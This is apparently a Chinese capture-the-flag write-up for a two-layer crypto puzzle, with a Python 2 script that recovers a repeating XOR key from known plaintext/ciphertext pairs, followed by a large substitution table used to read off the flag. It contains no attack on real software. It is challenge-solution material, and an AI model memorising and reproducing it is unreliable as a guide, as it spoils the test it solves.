bFFtcRsFmWb51mTM233vPJB1y9bV0D3Y:KAANQlAlJ3cXPBFTdwMVDmFXCkUzfxVLNwwyA2IefRE=
F5BeVeLdgC19SE2t07lYJJrGljSj0UHD:DHMJU2USGFUdKEJfFStzN2NTVWopfyU9Il8DP2IPBgw=
tW6MhdvlTmCLFbDbTDb1APNm2e3xStvR:PhF9e1sTIl0uBjAqAAwFIQcgWwIiZRkXfFBjLQEuOBo=
3ukNx9mtnAkL1BYfy8fDsKWTaII9xf03:eTMgeEtOOUUUKhgqdywYJSpcX3cQfgAuL3wZbCo8fns=
kRzK8mjx7Jty2jaVveddup4GhA7xa9yx:IRQxfQsaPklNIQcfdAQgFSUBXVcWRWM9JnRnLTNjNzA=
Q8b5oFZURt27ZZCHd1inbCWI5LugNRHh:G34pA1wxDmQoH0FRHDQCCzdVUF0BdgAze3klMhwIBiA=
RFZnNxdVambiS8kJqYpSS83NyBB2JIDo:GAARWH0PMGcbBhEPFVYqCSI9SWAwDWQ0N3cSZxgTCic=
qCl644XulSnRn0IGZ6I4f1KBPnc2gVnW:OwUnAAdDDEQWOB00KF4IBAlScAcFBBw4HlszZzUMIB8=
RpU8bMZgiWrQ7z8tcIsDhn7WdgatzIcf:GDYeDlE6DlYTPAE3cRR5NzAtSncLW2AtKlIxISgTLS4=
lwTvOsFuFFggiBxfkRVF4JSreQXQVKPJ:JjEfQHwEEkQ8LRQBLyw5JTg2b3VXfwQIK2QIBAQRHgI=
ZmzdyHEEGCLKtyJ0tK3gjN29fr67AEeI:ECsxUko/EXQ9KD8tMhcLcycvClQJe2VDKEdmYhMfKwE=
hHzl1gaGzvwGWhBsb6bv6tth8pMDOTNz:Ig4xWgIQNXYAHQQhEQYDMDFSW0VVQSMSdkUdER0OADI=
9JN6JdLifVXCO2wyFLRgCOn0A23ouALb:cwwFAHkTGFgcPSslCVw2OhUoa1QgejlKDwdjOicbAio=
nm2oFdkiBavKozWxb07GJygt11D18Box:JCt5WXUTP1g4CgUtKRQWOzFUDnQpTDAOfwQUZGoYITA=
DUuNGLog0O6YdZ6I4Jm4MeGHF2jnbJsP:DhM+eHQ7O1ZKJEU/IjR3CmcuVAcuUBAyCAc6OzAQPRg=
YCvOkOn2aN67SA7SP12jjrT8d1gflAih:EwU9eVg4OgMbJUVRFS92EANVC1kJRwNCKgQ3Mz4bJyA=
eIf315D2mOKnwzw5Zbba3DLg3HPcmdl2:Lw8tBQJCEAMXJDgIMRQ2dgkGW1JQcRsdfX0ANj8+Ino=
rWY0xB7bpRNprOZ5ZTyHzPkSgxgWhvNN:OBESBks1Y1MKOT0WNCEbdgkwQHsZZTwpKU03AjosAAY=
Slpd5PzNFnajJ1YmaVfLHEtjp2aNrfA6:GSo7UgYnLn88BRIMDF8YLjIyX38rcCMQPgcxGyA8D34=
zU6ogOVFDGLQySZqvCzqbG5DTtST9lWJ:MBN9WVQ4Anc+LD83Pz0bMiUnQ0IBcmI+GkEDAWs2GQI=
xGXPZQdyCUCSHzF6bz0Wg37AhE7LeziE:MgETZmkmMEg5PjA1DhQHdTEeCWQEBmA7JnBnGTcgJw0=
gGrKrUqgAAEzwTBB38KXC3UtdLuU8MjX:LQE5fUEiJVY7KjYcMToDAWBccmsgBgIOKnklAGoXJBA=
0e58LbdxgzgoqtRG5wD4wABz6rJPigAm:eiN+Dn8VMEkdERQJNxoTBGYTfQcUdBUAeEcaBTs9DyU=
NMk6yWdBxJwkcCu39A1ZioOyYFCRXGi5:BAsgAEogMHMCIQQNJS00cGolCGkKWhgDF3MTBwodJ30=
v5QkeMOOq0gbGCdHTFhq5Gw6gt9hzA78:PHMaXVY6G34LWxQEAS0lCwciUUJWciBMKUFpPSgbeXA=
8fYh0zRZQ5MbimlDdQiM2baUrOXJgLno:ciASXgMNBmsrXj4ELwMtBzc1UH5RVzYvPHoIHzUWICc=
TUCS4UJ3UFrHlZWaPqt6upvqH8vA2Ilr:HhMIZQciHgIvLQEuKjQWIgMVTQUWRSELBg0mFGATIjo=
gLlCJqeVE1IqevpQz3j60gs8eSVIK9y3:LQondXkGMWc/WjoXIxgxEilXUwVTUiRCK2YGHBljN3s=
PyJ3sc8AzGWtJBhZjwEtY7lJdpbF6SQJ:Gj8BBUAUbHAALCQSDCwpGTkTfEc6AjswKkUyE2QJHwI=
JnhfZZ2YLLv6QHUZqhHvKNp21XCdJKS1:ACgjUGktZmg2JwVQFyYUGSIMcUUoeydIf20TMRgRHXk=
Cc5X7LSGs1b5rApg3EfGpy1aQmci4q4X:CSV+bgQ7B3YJWhFTNC8xJGAhX3QTTGYbH1gzPGYrehA=
H8XJBYACeFIXbPx2KgHcRx4A6EERPQwv:An4TfHEuFXIfLTo+JD45cRgDcVAxTWM7eHAVBwILOT4=
h9lPnPc6Ty7OLL5zQAw1YGXSPf5bUOQb:In8nZl0nNwcuEkQpCiJ0OQIlTgI6cg8pHlNlNwcVHyo=
ITo1NGjk7xjP5VrMQ48nzga9UYyCc0MT:AxIkB30wPlpNExk2czgzDgJQAV0ZUjZDG2wpFjFqAxw=
P7SAzBgq5GqhK9P5t4i4escnKrBVDbQx:GnEYd0k1M0BPLAIODVcRdidQUAcGRjQUBUcSAxY4HzA=
0MzT9wT3Dk6mxeYe4ILqCX9ZXLZUbbgB:egsxYgoAAAI+AEULPgsYJmctdUIgbW4gFnkKADA4KQo=
jerklNX9oaHqDm9z2RL9wpDQ4hBdess0:ICM5XV85DAgVCjsXAgN4OWE2dQoURRMrel0SMTcpPXg=
0nCxvZ8rPKXzidRkyRd4UZBmYX3Buk03:eigITkUtbEMqICscLwoTKCo2XQc2bxUXF21jFycxfns=
pk116jHIA0jz0fkEXjBlA3AfUxUjoPrp:Oi16BwUdHHg7WxkcdggqBgsOe18iBhYcG00FPz0KPDg=
8nHVjPQ1mSpYWc3K8NXitV21lJDCQMgI:cigDYFknBQAXOAM/EQ1yCGsqYVoXY2VLIn8UFgMXKQE=

解码脚本为know1.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# -*- coding:utf-8 -*-
import base64
import binascii

f=open("known.txt",'r')
c="CzVrT1wCdFoUBARGMgYgN3McVkFDQzIINxUjPD8qIi0=".decode("base64")


str=f.readline()
strset=str.split(":")
i=0
plain=""
cipher=""
while True:
str=f.readline()
if str=="":
break
strs=str.split(":")
plain+=strs[0]
cipher+=base64.b64decode(strs[1])

f.close()
plain_list=list(plain)
cipher_list=list(cipher)

for i in range(0,len(plain)):
print ord(plain_list[i])^ord(cipher_list[i]),
xor=[74, 70, 75, 54, 51, 119, 84, 49, 122, 107, 115, 102, 70, 110, 65, 67, 83, 100, 57, 51, 99, 53, 87, 122,78, 53, 80, 85, 82, 90, 78, 72]
print '*********************************************32位的循环的数组是********************************'
print xor
print '***************************************明文是*********************************'
for k in range(0,len(c)):
c_list = list(c)
print chr(ord(c_list[k])^xor[k]),

运行结果如图

Paste_Image.png
得到这个明文后解开rar压缩包,进入第二层
有明文密文的对应文件,还有待解的密文:uAmUXk{jW{Stp{JpMA0spF7OS0SS0aq8

第二层是个替换,明文密文相应位置的字符串是一一对应的,直接肉眼+搜索 得到flag

Paste_Image.png

Paste_Image.png
第二层的明文密文对应文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
RL{2B6r}PjD4bW0sQLU5pDxKjh77msLK:zwX4G1C8MgE0QK{yDwI5VEOtgb33nywt
BR08l4n0Pzxit9D}sZQSbCUxJaHjCFB4:Gz{2A0p{MBOsS9E8y}DxQTIOfmLgTPG0
RLLFnQZcOxBKG2TRUnpZ9XwgpEfjHxcf:zwwPpD}aHOGtW4FzIpV}9eJUVhugLOau
vzPTSaPL4u5PKJBxxMHUIgiyC9mek}4v:rBMFxmMw0j5MtfGOOcLINUsRT9nYq80r
1j5ma{2eHJUs5rGfHR98809QcuSMfZHS:6g5nmX4YLfIy5CWuLz922{9Dajxcu}Lx
dXuXNy6cuxRAPDc9zo}0sLiPgqrjXyEL:vejeiR1ajOzlMEa9BZ8{ywsMUoCgeRhw
KFvrvA53camHZgDPsFDKQhSJkIsU3zsk:tPrCrl57amnL}UEMyPEtDbxfqNyI7Byq
1EDt9}Xs{O66iN3EJXpBW}cLaZK}K4LW:6hES98eyXH11si7hfeVGK8awm}t8t0wK
spakDcQMCuUmKInDNucfF98m{cm9vIPQ:yVmqEaDcTjIntNpEijauP92nXan9rNMD
aWTgKZUaicxAmk3JtPA3smKrZLCncmOv:mKFUt}ImsaOlnq7fSMl7yntC}wTpanHr
dZEPSxc0axftgFjwjLlUnDI}iTZSqt1D:v}hMxOa{mOuSUPgJgwAIpEN8sF}xoS6E
MdjQTWgUMc0Tl6g{VRvDa77HBRDjxZG2:cvgDFKUIca{FA1UXdzrEm33LGzEgO}W4
PX3{k7xQ6E6BIzALfsMC5n1s0R4Q{IVe:Me7Xq3OD1h1GNBlwuycT5p6y{z0DXNdY
Jlq7s4UUa2e0li4mOrYqg6YbxNc0ObEv:fAo3y0IIm4Y{As0nHCkoU1kQOia{HQhr
wpxK6rmHye94HsIz5rDxknEuRuH}ztb9:JVOt1CnLRY90LyNB5CEOqphjzjL8BSQ9
edwYmjgoRHA2WU9b7mxXN2kNgaRLi4lf:YvJkngUZzLl4KI9Q3nOei4qiUmzws0Au
EAzVOSBWy3Hp5pBlaj7bCcvdGxYxHNAK:hlBdHxGKR7LV5VGAmg3QTarvWOkOLilt
ED3KWizLhBbt8GMZkulKt{L2GHrP6SN7:hE7tKsBwbGQS2Wc}qjAtSXw4WLCM1xi3
0cufDFlaY{lYyq1Q0oiLtggLStwO2zou:{ajuEPAmkXAkRo6D{ZswSUUwxSJH4BZj
XJnbyARVgZ4hOXZf{IpbQWFnlZA{1MmR:efpQRlzdU}0bHe}uXNVQDKPpA}lX6cnz
1yz2xjl46sQ{stPHxfxj7KIWguDaOaiO:6RB4OgA01yDXySMLOuOg3tNKUjEmHmsH
DItOOgKvKgUjh43v8LrE9s6CTjxVmEd8:ENSHHUtrtUIgb07r2wCh9y1TFgOdnhv2
dfaDuZNCVxGGvZABHiON3h5X9}vl2CIM:vumEj}iTdOWWr}lGLsHi7b5e98rA4TNc
jJy30{59}OwwSDqW{p8Watl5fQmvYflU:gfR7{X598HJJxEoKXV2KmSA5uDnrkuAI
H0IVZwwZJybbFS3JVX8mXZBl}gCDJotf:L{Nd}JJ}fRQQPx7fde2ne}GA8UTEfZSu
JvWtBZ{xUuZvdaHIEGyCPguxblh8CSRY:frKSG}XOIj}rvmLNhWRTMUjOQAb2Txzk
8{6pSCQ5aa94BEWtndx84uyB{VoSsyq}:2X1VxTD5mm90GhKSpvO20jRGXdZxyRo8
8KlJcBijgetB1v9LIAbmD3sM86fnZf4j:2tAfaGsgUYSG6r9wNlQnE7yc21up}u0g
wTs76zRFPU2fb7uNvbUOhFbXz7lmiZNg:JFy31BzPMI4uQ3jirQIHbPQeB3Ans}iU
fB0o8jatyuwWj70n}fLRNSYvInXgVg0g:uG{Z2gmSRjJKg3{p8uwzixkrNpeUdU{U
x}YsoDqtlQAkIr70s1RD{6xZgv8K8WdR:O8kyZEoSADlqNC3{y6zEX1O}Ur2t2Kvz
Eh5pZ9z7R2IXKqmiErCrYGB{B1N9BJY}:hb5V}9B3z4NetonshCTCkWGXG6i9Gfk8
u7AeFMe09C245u5XjlCJcqe0zR31qTQR:j3lYPcY{9T405j5egATfaoY{Bz76oFDz
WJY}P4BJzXrAW8aohAJt{myNeQ4gdwJk:Kfk8M0GfBeClK2mZblfSXnRiYD0UvJfq
rXvY6jTZ9kCvHapuTcOwBPyKsXz9Akv2:Cerk1gF}9qTrLmVjFaHJGMRtyeB9lqr4
tpFqwfFQtTopHlKfK3PUpcpvyQsGZm87:SVPoJuPDSFZVLAtut7MIVaVrRDyW}n23
ONjAXeAv7R0w5G2KTUP0cXqOgEK5hMrF:HigleYlr3z{J5W4tFIM{aeoHUht5bcCP
Sn8o61Jg8OL1hIzJ0kpwhlaP6P{h3MSf:xp2Z16fU2Hw6bNBf{qVJbAmM1MXb7cxu
IU}dwoOHQUUsxEsQCSFGkN5tmR9op9uS:NI8vJZHLDIIyOhyDTxPWqi5Snz9ZV9jx
RgIlbCkQZhBbQgYTjY6l7Ix6VNNPDgxQ:zUNAQTqD}bGQDUkFgk1A3NO1diiMEUOD
Ym68hpjBtbbMpHr1QmzSeVAH08F89ZTM:kn12bVgGSQQcVLC6DnBxYdlL{2P29}Fc
}i3GFnxz05c}{QE7ODZUGnrCx6gUQHjn:8s7WPpOB{5a8XDh3HE}IWpCTO1UIDLgp
B3C2n5MV74GLXbL{IMPueVTeaH6fZZQC:G7T4p5cd30WweQwXNcMjYdFYmL1u}}DT
KSzY6MmwzyC8UibTClNMerj58ilIx}cm:txBk1cnJBRT2IsQFTAicYCg52sANO8an
dPWIXjSDhcuZo4MJi87iPqleCZy6{uVi:vMKNegxEbaj}Z0cfs23sMoAYT}R1Xjds
FZ75DoEcW}3tVHQ90BJpf6eLijYlPe00:P}35EZhaK87SdLD9{GfVu1YwsgkAMY{{
iewAUhamPF5ztC8yYgK2GvhDJgygL74U:sYJlIbmnMP5BST2RkUt4WrbEfURUw30I
GRqBjIGoVxXGhlSU1MKer9ipS98joeFi:WzoGgNWZdOeWbAxI6ctYC9sVx92gZYPs
aJbO0yJchXWZb{6F8I4q98EzUXulEkbO:mfQH{RfabeK}QX1P2N0o92hBIejAhqQH
pIXcicLKSIrts2OHsZGh2iIRSkdOm9ED:VNeasawtxNCSy4HLy}Wb4sNzxqvHn9hE
X}LS0IAoLqyt12pJMFRw4plXZgnzPBtx:e8wx{NlZwoRS64VfcPzJ0VAe}UpBMGSO
z4ya9hUK6cQkWuUXk0zcK5oPG5Tr9etp:B0Rm9bIt1aDqKjIeq{Bat5ZMW5FC9YSV
OoYjGEKmiGnuoja4ZrwdO8Eqh2G1GxQ5:HZkgWhtnsWpjZgm0}CJvH2hob4W6WOD5
inq23gcWn1uQkC2VtNf0nL}OOkO7Vevb:spo47UaKp6jDqT4dSiu{pw8HHqH3dYrQ
mtjMG4HdtQnP{7p87kKhnSuaVCTTV25q:nSgcW0LvSDpMX3V23qtbpxjmdTFFd45o
mY0INsnSl25PCNEEDKsvqOj5bWLZ0qqI:nk{NiypxA45MTihhEtyroHg5QKw}{ooN
BwPtUoiwI0Doe1n5MA4vnQhfCZkyLK6h:GJMSIZsJN{EZY6p5cl0rpDbuT}qRwt1b
ULgf0Y5wsB3ODdHVNYDF{{vpuhZ6BWWZ:IwUu{k5JyG7HEvLdikEPXXrVjb}1GKK}
nHGdm1n7jgZST{HklgeRln8RN9Fq7TQw:pLWvn6p3gU}xFXLqAUYzAp2zi9Po3FDJ
AN0FkR2INplT5nlhka4D2ZQiOrXQzZap:li{Pqz4NiVAF5pAbqm0E4}DsHCeDB}mV
TfOQeUy5}VE{RUlNY5KTy46QHcZb}SUm:FuHDYIR58dhXzIAik5tFR01DLa}Q8xIn
NdwZXd2hwLRXOe4yxQ{wn2SoTalfssjA:ivJ}ev4bJwzeHY0RODXJp4xZFmAuyygl
IKMEdztj}t{a0vSUTXaeNID0UlvJ1b6p:NtchvBSg8SXm{rxIFemYiNE{IArf6Q1V
fEsvGyeh0DhFY1otrfBbAIQCfXN9fHs2:uhyrWRYb{EbPk6ZSCuGQlNDTuei9uLy4
cuFUbjiKr0WJsR2ICpZZqE8HlRshuRxs:ajPIQgstC{Kfyz4NTV}}oh2LAzybjzOy
V9YuyzrW0ltb0PhePKz}TUDNtrCdJqLQ:d9kjRBCK{ASQ{MbYMtB8FIEiSCTvfowD
WemRdmrExp33r6Ycd6YAGhW2etT4SCQM:KYnzvnChOV77C1kav1klWbK4YSF0xTDc
DtUPvo4o}CCN4DdBms7j3Zifkz4GFcXV:ESIMrZ0Z8TTi0EvGny3g7}suqB0WPaed
1EEY8wJUYJm2H}E05wh8M{Zl}u05EiUi:6hhk2JfIkfn4L8h{5Jb2cX}A8j{5hsIs
1zX4}QsRhusHt7iSNM{b9PKWYcwRWHy{:6Be08DyzbjyLS3sxicXQ9MtKkaJzKLRX
cEn2VlJvD2{yx{ccQyHt8eywIWk7G{8b:ahp4dAfrE4XROXaaDRLS2YRJNKq3WX2Q
cVqeksFDEQfm7lMyKbp5eO}OynQH4I7L:adoYqyPEhDun3AcRtQV5YH8HRpDL0N3w
EFb115C0x95IVulTaHDIAUPo0DUU3{DK:hPQ665T{O95NdjAFmLENlIMZ{EII7XEt
Y1Y7eM7ZYpRYHkTmayKQA}L3B}lSypdp:k6k3Yc3}kVzkLqFnmRtDl8w7G8AxRVvV
FDNDq1Gw6iuXL8E9yqeV}QITXnU6K3A2:PEiEo6WJ1sjew2h9RoYd8DNFepI1t7l4
ip6jFK}TYyI9WcBSVtY}Ie3mgcFN5snC:sV1gPt8FkRN9KaGxdSk8NY7nUaPi5ypT
b4txnI4x7rhCcLiGmqMp2zvxUXzkYdz0:Q0SOpN0O3CbTawsWnocV4BrOIeBqkvB{
oUSeqzitw9YPb{WYOC7y4J38R6KiWLxz:ZIxYoBsSJ9kMQXKkHT3R0f72z1tsKwOB
UG7hM{QtSL5tUIpEIU9{10xpR3ShhwOw:IW3bcXDSxw5SINVhNI9X6{OVz7xbbJHJ
IKQYSTGGCqMysCLfoWWiRbQ25oRq}rtp:NtDkxFWWTocRyTwuZKKszQD45Zzo8CSV
hQ0ZHGJBgzqyHfJs9PpXeIzlvqd14PON:bD{}LWfGUBoRLufy9MVeYNBArov60MHi
g5zVZBklS}MvFF}sjLnMDqyP8gAdLV2w:U5Bd}GqAx8crPP8ygwpcEoRM2Ulvwd4J
sZflyMOrYkUKJJDZc8EApLcpV026UD2J:y}uARcHCkqItffE}a2hlVwaVd{41IE4f
{W9EVSFgwnwfzlHVVkpJ}7VUvssq3mNc:XK9hdxPUJpJuBALddqVf83dIryyo7nia
n1MngegiaPwYjE2Xr{WumkZAnFLByplv:p6cpUYUsmMJkgh4eCXKjnq}lpPwGRVAr
bnWuNGyZ6NGVVs2bsBZ7lLbi4H1D3mAg:QpKjiWR}1iWddy4QyG}3AwQs0L6E7nlU
bNwjkSp{ewBmqeAeQ5ZklRvytkxXLU5G:QiJgqxVXYJGnoYlYD5}qAzrRSqOewI5W
tNSsZsFcqt{EWbvFTo66txD7Cy1Cyho7:Sixy}yPaoSXhKQrPFZ11SOE3TR6TRbZ3
rWfpzhy3scsJXxirYD3HjVDktraczIIk:CKuVBbR7yayfeOsCkE7LgdEqSCmaBNNq
T9L8lPg6mLjhvPqKTA13ShLiQ7Aop90j:F9w2AMU1nwgbrMotFl67xbwsD3lZV9{g
{lCyXN76WhXs1RZ3dGiC{D2IGBcTueGP:XATRei31Kbey6z}7vWsTXE4NWGaFjYWM
koOfN6EJDVQHUO6qjQK8OAqdPsjSeZf{:qZHui1hfEdDLIH1ogDt2HlovMygxY}uX
h3sj2R9IcPPGKqA34tlfsnlXMSzUVi32:b7yg4z9NaMMWtol70SAuypAecxBIds74
m5oFdccwlhQ9}if25XYJ0w8DVL9N04z3:n5ZPvaaJAbD98su45ekf{J2Edw9i{0B7
X9DAzHoF54hN{fZSSLd91eK9RPNjgCJi:e9ElBLZP50biXu}xxwv96Yt9zMigUTfs
1acZM}rp9NnDGQBb1pnxBH0oYnwbMy7Y:6ma}c8CV9ipEWDGQ6VpOGL{ZkpJQcR3k
1QCaUnFASGV4EfBZ7DBLugHcoJ8R8g5o:6DTmIpPlxWd0huG}3EGwjULaZf2z2U5Z
ITa9D0O5XWqRCY{Ns7MAmTi70VqDtnLw:NFm9E{H5eKozTkXiy3clnFs3{doESpwJ
uutbvLa5JHuYSQb8U}0PBdS53g}1915P:jjSQrwm5fLjkxDQ2I8{MGvx57U86965M
{BngXfmzyOMqi{{8Z45uVhpS4bLNdCNi:XGpUeunBRHcosXX2}05jdbVx0QwivTis

泽君的web400wp挺精彩的,这里推荐一波http://www.jianshu.com/p/607ea271ef1f

-------------本文结束感谢您的阅读-------------